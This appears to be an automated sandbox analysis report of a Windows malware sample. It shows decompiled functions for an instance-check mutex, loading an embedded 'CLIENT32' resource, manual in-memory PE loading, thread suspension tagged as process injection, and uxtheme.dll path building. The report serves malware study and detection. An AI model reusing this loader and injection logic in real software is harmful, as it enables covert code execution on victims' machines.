_memset.LIBCMT ref: 00DB22A1

Part of subcall function 00DB2604: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00DB22B7,00000000,00000000,00000000), ref: 00DB262D
Part of subcall function 00DB2604: _memset.LIBCMT ref: 00DB2645
Part of subcall function 00DB2604: SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00DB2678
Part of subcall function 00DB2604: LocalAlloc.KERNEL32(00000040,00000014), ref: 00DB2690
Part of subcall function 00DB2604: _memset.LIBCMT ref: 00DB26A7
Part of subcall function 00DB2604: InitializeSecurityDescriptor.ADVAPI32(00DB22B7,00000001), ref: 00DB26B4
Part of subcall function 00DB2604: SetSecurityDescriptorDacl.ADVAPI32(00DB22B7,00000001,7622DAA3,00000000), ref: 00DB26CB
Part of subcall function 00DB2604: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DB26EC
Part of subcall function 00DB2604: GetProcAddress.KERNEL32(00000000), ref: 00DB26F3
Part of subcall function 00DB2604: LocalAlloc.KERNELBASE(00000040,00000200), ref: 00DB270C
Part of subcall function 00DB2604: InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00DB2718
Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB2777
Part of subcall function 00DB2604: LocalFree.KERNEL32(00000000), ref: 00DB277E
Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB2786
Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27A3
Part of subcall function 00DB2604: LocalFree.KERNEL32(00DB22B7), ref: 00DB27AC
Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27B0
Part of subcall function 00DB2604: LocalFree.KERNEL32(7622DAA3), ref: 00DB27B9
Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27BD
Part of subcall function 00DB2604: FreeSid.ADVAPI32(00DB22B7), ref: 00DB27C6
Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27CE

CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22C5
GetLastError.KERNEL32(?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22D1

Strings

Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}, xrefs: 00DB22BB

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLast$Local$Free$Initialize_memset$AllocDescriptorSecurity$AddressAllocateCreateDaclEntriesLibraryLoadMutexProc
String ID: Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}
API String ID: 875962283-4277701779
Opcode ID: 61b5212c2145b42a4937cef9afd2b4889bb2102db4dc2003e7beb477da48dca3
Instruction ID: 2907819634384cf59286a95c3c23732b41fa501f8bdabc6b34577230f0cf9767
Opcode Fuzzy Hash: 61b5212c2145b42a4937cef9afd2b4889bb2102db4dc2003e7beb477da48dca3
Instruction Fuzzy Hash: 92E0927BE01328F7CB20B3E5AC0ADDB7B6CCB04790B400120BE02E3242EA64D644C2F4

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1434, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00DB1434(void* __eflags) {
				void* _t1;
				void* _t6;

				__imp__#680(); // executed
				_t1 = E00DB2291(__eflags); // executed
				_t6 = _t1;
				if(_t6 != 0) {
					if(GetLastError() != 0xb7) {
						E00DB13D0("CLIENT32");
					}
					CloseHandle(_t6);
				}
				return 0;
			}

0x00db1435
0x00db143b
0x00db1440
0x00db1444
0x00db1451
0x00db1458
0x00db1458
0x00db145e
0x00db145e
0x00db1466

APIs

IsUserAnAdmin.SHELL32 ref: 00DB1435

Part of subcall function 00DB2291: _memset.LIBCMT ref: 00DB22A1
Part of subcall function 00DB2291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22C5
Part of subcall function 00DB2291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22D1

GetLastError.KERNEL32(?,?), ref: 00DB1446
CloseHandle.KERNEL32(00000000), ref: 00DB145E

Part of subcall function 00DB13D0: FindResourceA.KERNEL32(00000000,00DB145D,0000000A), ref: 00DB13D8
Part of subcall function 00DB13D0: LoadResource.KERNEL32(00000000,00000000,?,?), ref: 00DB13E5
Part of subcall function 00DB13D0: LockResource.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00DB13F3

Strings

CLIENT32, xrefs: 00DB1453

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Resource$ErrorLast$AdminCloseCreateFindHandleLoadLockMutexUser_memset
String ID: CLIENT32
API String ID: 2587862435-3575452709
Opcode ID: 5e532bea3d047ae839706050cdae8f1f469a0922511ca5dc8368bc7e16463057
Instruction ID: 6df9904ed418aebc57bfd456ec4aa4947daf95fb710082208be109f62b15bdcb
Opcode Fuzzy Hash: 5e532bea3d047ae839706050cdae8f1f469a0922511ca5dc8368bc7e16463057
Instruction Fuzzy Hash: 33D0123E905722CA9351337D7C3D5DD2250DF517D1BD90664F907E5A15DB04CD8241FA

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1A94, Relevance: 5.1, APIs: 4, Instructions: 130
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E00DB1A94(void* __edi, signed short* _a4) {
				void* _v8;
				signed short* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				signed int* _v32;
				intOrPtr* _v36;
				void* _t84;
				void* _t93;
				void* _t104;
				signed int* _t129;
				intOrPtr _t131;
				void* _t132;

				_t132 = __edi;
				_v12 = _a4;
				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
					_v36 = _a4 + _v12[0x1e];
					if( *_v36 == 0x4550) {
						_t84 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x2000, 4); // executed
						_v16 = _t84;
						if(_v16 == 0) {
							_v16 = VirtualAlloc(0,  *(_v36 + 0x50), 0x2000, 4);
						}
						if(_v16 != 0) {
							_v28 = E00DB14F3(0x14);
							 *((intOrPtr*)(_v28 + 4)) = _v16;
							 *(_v28 + 0xc) =  *(_v28 + 0xc) & 0x00000000;
							 *(_v28 + 8) =  *(_v28 + 8) & 0x00000000;
							 *(_v28 + 0x10) =  *(_v28 + 0x10) & 0x00000000;
							VirtualAlloc(_v16,  *(_v36 + 0x50), 0x1000, 4); // executed
							_t93 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, 4); // executed
							_v8 = _t93;
							_push(_v12[0x1e] +  *(_v36 + 0x54));
							_push(_v12);
							_push(_v8);
							E00DB1489();
							 *_v28 = _v8 + _v12[0x1e];
							 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
							E00DB171C(_a4, _v36, _v28); // executed
							_t129 = _v16 -  *(_v36 + 0x34);
							_v32 = _t129;
							if(_t129 != 0) {
								E00DB1884(_v28, _v32);
							}
							_t104 = E00DB1903(_t129, _v28); // executed
							if(_t104 != 0) {
								E00DB17BF(_t129, _v28); // executed
								if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
									L18:
									return _v28;
								}
								_t131 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
								_v24 = _t131;
								if(_t131 != 0) {
									_v20 = _v24(_v16, 1, 0);
									if(_v20 != 0) {
										 *(_v28 + 0x10) = 1;
										goto L18;
									}
									goto L19;
								}
								goto L19;
							} else {
								L19:
								E00DB1A23(_t132, _v28);
								return 0;
							}
						} else {
							return 0;
						}
					}
					return 0;
				}
				return 0;
			}

0x00db1a94
0x00db1a9d
0x00db1aab
0x00db1abd
0x00db1ac9
0x00db1ae5
0x00db1aeb
0x00db1af2
0x00db1b09
0x00db1b09
0x00db1b10
0x00db1b20
0x00db1b29
0x00db1b2f
0x00db1b36
0x00db1b3d
0x00db1b51
0x00db1b67
0x00db1b6d
0x00db1b7c
0x00db1b7d
0x00db1b80
0x00db1b83
0x00db1b94
0x00db1b9e
0x00db1baa
0x00db1bb5
0x00db1bb8
0x00db1bbb
0x00db1bc3
0x00db1bc3
0x00db1bcb
0x00db1bd2
0x00db1bdb
0x00db1be9
0x00db1c20
0x00000000
0x00db1c20
0x00db1bf3
0x00db1bf6
0x00db1bf9
0x00db1c09
0x00db1c10
0x00db1c19
0x00000000
0x00db1c19
0x00000000
0x00db1c12
0x00000000
0x00db1bd4
0x00db1c25
0x00db1c28
0x00000000
0x00db1c2d
0x00db1b12
0x00000000
0x00db1b12
0x00db1b10
0x00000000
0x00db1acb
0x00000000

APIs

VirtualAlloc.KERNELBASE(?,?,00002000,00000004,?,?,?,00DB1426,00000000,?,00000000,?,?,?), ref: 00DB1AE5
VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B03

Part of subcall function 00DB14F3: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004,00DB1408,?,?,?), ref: 00DB1500

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000014,?,?,?,00DB1426,00000000), ref: 00DB1B51
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B67

Part of subcall function 00DB171C: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB176D
Part of subcall function 00DB171C: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB178A

Part of subcall function 00DB1903: IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00DB1933
Part of subcall function 00DB1903: LoadLibraryA.KERNEL32(?), ref: 00DB195A
Part of subcall function 00DB1903: GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00DB19CF
Part of subcall function 00DB1903: IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00DB1A05

Part of subcall function 00DB17BF: VirtualFree.KERNEL32(?,?,00004000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?,?), ref: 00DB180F
Part of subcall function 00DB17BF: VirtualProtect.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?), ref: 00DB185B

Part of subcall function 00DB1A23: FreeLibrary.KERNEL32(?,?,00000000,00000000,00DB1C2D,?,?,?,?,00DB1426), ref: 00DB1A60
Part of subcall function 00DB1A23: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,00DB1C2D,?,?,?,?,00DB1426), ref: 00DB1A83

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Virtual$Alloc$Free$LibraryRead$AddressLoadProcProtect
String ID:
API String ID: 4109881786-0
Opcode ID: 02eb2f0a0a22f84c9da743ed2851a08c96e3c713756c16c577c8354579060068
Instruction ID: f53aa9ae489532efa7a6123948a687bbb05a99cf9dc35588e26e265aec6cc0c3
Opcode Fuzzy Hash: 02eb2f0a0a22f84c9da743ed2851a08c96e3c713756c16c577c8354579060068
Instruction Fuzzy Hash: E551B378A00209EFDF05DF94C856EEEBBB1FF08311F444099E602AB2A1D7759990DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DB17BF, Relevance: 3.1, APIs: 2, Instructions: 71
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DB17BF(void* __ecx, int* _a4) {
				signed int _v8;
				long _v12;
				int _t34;
				int _t36;
				signed char* _t40;
				void* _t44;
				signed int _t47;
				intOrPtr _t52;
				signed char _t54;
				unsigned int _t57;
				long _t58;
				unsigned int _t61;
				signed int _t63;
				long _t64;

				_t34 =  *_a4;
				_v8 = _v8 & 0x00000000;
				_t44 = ( *(_t34 + 0x14) & 0x0000ffff) + _t34 + 0x18;
				if(0 <  *((intOrPtr*)(_t34 + 6))) {
					_t40 = _t44 + 0x24;
					do {
						_t61 =  *_t40;
						_t47 = _t61 >> 0x0000001d & 0x00000001;
						_t63 = _t61 >> 0x0000001e & 0x00000001;
						_t57 =  *_t40 >> 0x1f;
						if(( *_t40 & 0x02000000) == 0) {
							_t54 =  *_t40;
							_t58 =  *(0xdb5000 + (_t57 + (_t63 + _t47 * 2) * 2) * 4);
							if((_t54 & 0x04000000) != 0) {
								_t58 = _t58 | 0x00000200;
							}
							_t64 =  *(_t40 - 0x14);
							if(_t64 != 0) {
								L12:
								_t36 = VirtualProtect( *(_t40 - 0x1c), _t64, _t58,  &_v12); // executed
								if(_t36 == 0) {
									break;
								}
								goto L13;
							} else {
								if((_t54 & 0x00000040) == 0) {
									if(_t54 >= 0) {
										goto L13;
									}
									_t52 =  *((intOrPtr*)(_t36 + 0x24));
									L11:
									if(_t52 == 0) {
										goto L13;
									}
									goto L12;
								}
								_t52 =  *((intOrPtr*)(_t36 + 0x20));
								goto L11;
							}
						}
						VirtualFree( *(_t40 - 0x1c),  *(_t40 - 0x14), 0x4000);
						L13:
						_t36 =  *_a4;
						_v8 = _v8 + 1;
						_t40 =  &(_t40[0x28]);
					} while (_v8 < ( *(_t36 + 6) & 0x0000ffff));
					return _t36;
				}
				return _t34;
			}

0x00db17c7
0x00db17cd
0x00db17d3
0x00db17db
0x00db17e3
0x00db17e7
0x00db17e7
0x00db17f3
0x00db17f6
0x00db17f9
0x00db1802
0x00db1817
0x00db181f
0x00db182c
0x00db182e
0x00db182e
0x00db1834
0x00db183b
0x00db1852
0x00db185b
0x00db1863
0x00000000
0x00000000
0x00000000
0x00db183d
0x00db1840
0x00db1849
0x00000000
0x00000000
0x00db184b
0x00db184e
0x00db1850
0x00000000
0x00000000
0x00000000
0x00db1850
0x00db1842
0x00000000
0x00db1842
0x00db183b
0x00db180f
0x00db1865
0x00db1868
0x00db186e
0x00db1871
0x00db1874
0x00000000
0x00db187f
0x00db1881

APIs

VirtualFree.KERNEL32(?,?,00004000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?,?), ref: 00DB180F
VirtualProtect.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,00DB1BE0,?,?,00000000,?,?), ref: 00DB185B

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 8b1c03d0c40ed982252d05209bafada637b1dba340f8ed871db1a1c04d74772d
Instruction ID: 6c63765b4017fcf349aa2fb2327d733e588950a9eb82d4890f3bf62fb5c1f1ea
Opcode Fuzzy Hash: 8b1c03d0c40ed982252d05209bafada637b1dba340f8ed871db1a1c04d74772d
Instruction Fuzzy Hash: F421AC3AA00214EFDB088F05D9A8FBA77A5FF45740F894198E9079B2A5DB30ED51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DB171C, Relevance: 2.6, APIs: 2, Instructions: 67
memoryCOMMON

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB176D
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00DB178A

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93281c14cf0f6ed5ab6b202462759646f010121c6f4300f485e68b5038ef42da
Instruction ID: 449ca516c4cd66b59f759c377b542a5a9e544ed28a4d9e89953ccb988fa466b2
Opcode Fuzzy Hash: 93281c14cf0f6ed5ab6b202462759646f010121c6f4300f485e68b5038ef42da
Instruction Fuzzy Hash: 3821F7B9A00208EFDB10DF99C995EAAB7F8EF48704F50845AF942DB351D670E950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DB22DC, Relevance: 2.5, APIs: 2, Instructions: 18
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00DB22DC(void* __eflags) {
				void* _t2;
				void* _t6;
				void* _t7;

				_t7 = 0; // executed
				_t2 = E00DB2291(__eflags); // executed
				_t6 = _t2;
				if(_t6 != 0) {
					_t1 = GetLastError() - 0xb7; // -183
					asm("sbb esi, esi");
					_t7 =  ~_t1 + 1;
					CloseHandle(_t6);
				}
				return _t7;
			}

0x00db22de
0x00db22e0
0x00db22e5
0x00db22e9
0x00db22f1
0x00db22f9
0x00db22fc
0x00db22fd
0x00db22fd
0x00db2307

APIs

Part of subcall function 00DB2291: _memset.LIBCMT ref: 00DB22A1
Part of subcall function 00DB2291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22C5
Part of subcall function 00DB2291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22D1

GetLastError.KERNEL32(00000000,7622DAA3,00DB232C,00000000), ref: 00DB22EB
CloseHandle.KERNEL32(00000000), ref: 00DB22FD

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleMutex_memset
String ID:
API String ID: 4044507352-0
Opcode ID: ac2c8af6b7e13828bba5d380d464c9d35d1a0c596f88fba6b64b5fac7f8ff472
Instruction ID: bf323537c2a38c29cb57f039e8be57b3b0ebee8a662e17e81aa1d5c481821ff5
Opcode Fuzzy Hash: ac2c8af6b7e13828bba5d380d464c9d35d1a0c596f88fba6b64b5fac7f8ff472
Instruction Fuzzy Hash: 5BD0A737504532CB8721276D7C0C99BBB74DFD1FA13120219EC4AE3210CB204C0346F5

Uniqueness

Uniqueness Score: -1.00%

Function 0040101D, Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32(00000000,?), ref: 004010BF

Memory Dump Source

Source File: 00000001.00000002.1212668515.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1212660695.00400000.00000004.sdmp
Associated: 00000001.00000002.1212676117.00402000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WBKDqSfWLj.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 5cfafb86fb150ef256dbbf0976cc62a29c7aba25a3c80d9efd8b766aac9a54dc
Instruction ID: fec0bbfb7cb5f5c9ff93f0aba7c4af0fb98ed251eecd6fb6de04687b49c31075
Opcode Fuzzy Hash: 5cfafb86fb150ef256dbbf0976cc62a29c7aba25a3c80d9efd8b766aac9a54dc
Instruction Fuzzy Hash: D831B075D10514AFEB50CEBC88453CABBF1BB8D351F618575EA59E7340EA3889839F20

Uniqueness

Uniqueness Score: -1.00%

Function 00DB14F3, Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DB14F3(long _a4) {
				void* _t2;

				_t2 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
				return _t2;
			}

0x00db1500
0x00db1506

APIs

VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004,00DB1408,?,?,?), ref: 00DB1500

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 786bbb09324558e326bfb219d026f576eb8cef762ca7d3d81b460934db655b2d
Instruction ID: 6c34671c4d1e9dd2474113f082fa61884b1b039c6196ccb7cec79d9555f4fb95
Opcode Fuzzy Hash: 786bbb09324558e326bfb219d026f576eb8cef762ca7d3d81b460934db655b2d
Instruction Fuzzy Hash: E0B01279684300FAE51157404D17F057F105750B11F00C000B304581D041B00010CA39

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00DB1C33, Relevance: 13.6, APIs: 9, Instructions: 66
threadprocessinjectionCOMMON

C-Code - Quality: 100%

			E00DB1C33(int _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v24;
				long _v28;
				void _v32;
				void* _v36;
				long _t29;
				void* _t33;
				signed int _t34;
				void* _t42;

				_v8 = _v8 & 0x00000000;
				_t33 = CreateToolhelp32Snapshot(4, _a4);
				if(_t33 == 0xffffffff) {
					GetLastError();
					L15:
					return _v8;
				}
				_t34 = 6;
				memset( &_v32, 0, _t34 << 2);
				_v36 = 0x1c;
				if(Thread32First(_t33,  &_v36) == 0) {
					GetLastError();
					goto L13;
				} else {
					do {
						if(_v24 == _a4) {
							_t29 = _v28;
							if(_a8 == 0 || _t29 == _a8) {
								_t42 = OpenThread(2, 0, _t29);
								if(_t42 != 0) {
									if(SuspendThread(_t42) != 0xffffffff) {
										_v8 = _v8 + 1;
									}
									CloseHandle(_t42);
								}
							}
						}
					} while (Thread32Next(_t33,  &_v36) != 0);
					L13:
					CloseHandle(_t33);
					goto L15;
				}
			}

0x00db1c39
0x00db1c48
0x00db1c4d
0x00db1ccc
0x00db1cd2
0x00db1cd7
0x00db1cd7
0x00db1c52
0x00db1c58
0x00db1c5f
0x00db1c73
0x00db1cc0
0x00000000
0x00db1c75
0x00db1c76
0x00db1c7c
0x00db1c82
0x00db1c85
0x00db1c97
0x00db1c9b
0x00db1ca7
0x00db1ca9
0x00db1ca9
0x00db1cad
0x00db1cad
0x00db1c9b
0x00db1c85
0x00db1cb9
0x00db1cc6
0x00db1cc7
0x00000000
0x00db1cc9

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00DB1C43
Thread32First.KERNEL32(00000000,?), ref: 00DB1C66
OpenThread.KERNEL32(00000002,00000000,00DB1FAF,7622D965,00000000,00000004,?,00000000), ref: 00DB1C91
SuspendThread.KERNEL32(00000000), ref: 00DB1C9E
CloseHandle.KERNEL32(00000000), ref: 00DB1CAD
Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB1CB4
GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00DB1CC0
CloseHandle.KERNEL32(00000000), ref: 00DB1CC7
GetLastError.KERNEL32(00000004,?,00000000,?,?,00DB1FAF,00000000,00000000,00000000), ref: 00DB1CCC

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: CloseErrorHandleLastThreadThread32$CreateFirstNextOpenSnapshotSuspendToolhelp32
String ID:
API String ID: 2698708724-0
Opcode ID: 5c158de03dea4ff16404acaa90009ce95620e0638fd3e800d25eb470a70ddbb4
Instruction ID: 7215ab3100440b43056a19001947202ec70c33e522c6695cccabd6f235e4cd0a
Opcode Fuzzy Hash: 5c158de03dea4ff16404acaa90009ce95620e0638fd3e800d25eb470a70ddbb4
Instruction Fuzzy Hash: 5C11083D940208EBDB21ABA4CD55FEEBBB8EF08360F640211F502E6291D770DD448B70

Uniqueness

Uniqueness Score: -1.00%

Function 00DB259B, Relevance: 3.0, APIs: 2, Instructions: 18
fileCOMMON

C-Code - Quality: 100%

			E00DB259B(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				void* _t4;
				void* _t7;

				_t7 = 0;
				_t4 = FindFirstFileA(_a4,  &_v324);
				if(_t4 != 0xffffffff) {
					_t7 = 1;
					FindClose(_t4);
				}
				return _t7;
			}

0x00db25af
0x00db25b1
0x00db25ba
0x00db25bd
0x00db25be
0x00db25be
0x00db25c8

APIs

FindFirstFileA.KERNEL32(00DB2DA5,?,00000104), ref: 00DB25B1
FindClose.KERNEL32(00000000), ref: 00DB25BE

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: af0ed99421243d67001db2372694620b48ab375b3f46bfbf7262521d4f6f035f
Instruction ID: 10e0edbe2848859e697a86e3e899d595c11bef3a72543081eee1d3830082e702
Opcode Fuzzy Hash: af0ed99421243d67001db2372694620b48ab375b3f46bfbf7262521d4f6f035f
Instruction Fuzzy Hash: 78D05EB6900124EBC7113769AC089EE766CDB09325F500321FE1AD11E0E734DA9A86F5

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3E80, Relevance: .0, Instructions: 2
COMMON

C-Code - Quality: 100%

			E00DB3E80() {

				return  *[fs:0x30];
			}

0x00db3e86

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3143, Relevance: 61.5, APIs: 30, Strings: 5, Instructions: 279
fileclipboardregistryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00DB3143(void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				signed int _v32;
				struct HINSTANCE__* _v36;
				char _v296;
				char _v556;
				char _v816;
				char _v1076;
				char _v1336;
				char _v1596;
				struct HINSTANCE__* _t88;
				void* _t105;
				signed int _t125;
				void* _t130;
				long _t135;
				long _t162;
				void* _t174;
				void* _t182;
				intOrPtr* _t189;
				int _t190;
				void* _t194;
				void* _t195;
				void* _t196;

				_v28 = 0;
				_t88 = GetModuleHandleA(0);
				_v12 = 0;
				_v24 = 0;
				_v36 = _t88;
				GetSystemDirectoryA( &_v816, 0x104);
				E00DB2194(_t194 + E00DB20EC( &_v816) - 0x32c, "\\uxtheme.dll");
				GetTempPathA(0x104,  &_v296);
				E00DB2194(_t194 + E00DB20EC( &_v296) - 0x124, "\\uxtheme.dll");
